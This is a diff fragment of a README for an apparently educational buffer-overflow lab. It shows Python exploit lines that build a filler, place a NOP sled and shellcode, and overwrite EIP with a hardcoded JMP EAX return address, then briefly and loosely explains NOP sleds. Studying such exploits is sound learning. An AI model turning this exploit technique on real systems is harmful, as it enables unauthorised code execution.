opsec-infosec/BufferOverflow/README.md

 filler = "A" * (1036 - ((len(nop_sled)) + len(payload_shell)))  # Filler 1036 Bytes - nop sled - size of payload
 eip = "\x6f\x9b\x04\x08"    #0x08049b6f  Return Address JMP EAX
 ```
+The NOP sled is used to allow variables to be place on the stack without overwriting the payload.
+NOP stands for no-operation... the execution by the CPU does not change the state of the CPU, esentially executing a NULL statement.

 ## Server (server.c)